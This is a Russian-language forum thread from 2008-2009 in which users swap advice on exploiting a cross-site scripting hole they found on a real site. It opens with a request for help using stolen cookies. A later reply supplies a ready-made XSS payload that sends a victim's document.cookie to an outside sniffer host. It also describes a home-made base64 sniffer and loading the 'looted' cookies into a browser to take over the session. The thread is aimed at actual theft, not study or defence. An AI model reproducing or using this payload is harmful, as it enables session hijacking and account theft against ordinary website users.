Нашел уязвимость. Через XSS можно сунуть любой скрипт, ткаим образом достал кукисы, но что с ними сделать??? Если можно, еще один вопрос, можно-ли на JS написать код фтп-сервера прям на странице? Если можно,то как?Плиз. помогите
21.10.2008 20:56:19
а cookies надо есть
Изменено: ZER0 - 21.10.2008 20:56:29
|
|||
|
|
27.10.2008 22:37:27
а через XSS можно доступ к БД сайта как нибудь получить?
|
|
|
|
27.10.2008 23:09:32
|
|
|
|
27.10.2008 23:16:35
Изменено: FixET - 27.10.2008 23:16:53
|
|
|
|
18.02.2009 16:16:19
vobshem,esli ty ugonyaesh kuki,to ispolzui:
1)javascript //cherez nego posylaesh po location.href + cookie zhertvu i vse: primer: "><script>location.href="http://sniffer.com"+escape(document.cookie)</script> 2)sniffer vot moi poprobui,sam kodil (cookie v parametre "cookie",redirekt [kuda zhertva potom poidet] v parametre "to",zashifrovannom base64 [shifrator tozhe prilagaetsa]: 3)operu chtoby vstavit nagrablennoe udachi. |
|
|
|
25.02.2009 10:52:35
|
||||
|
|
|||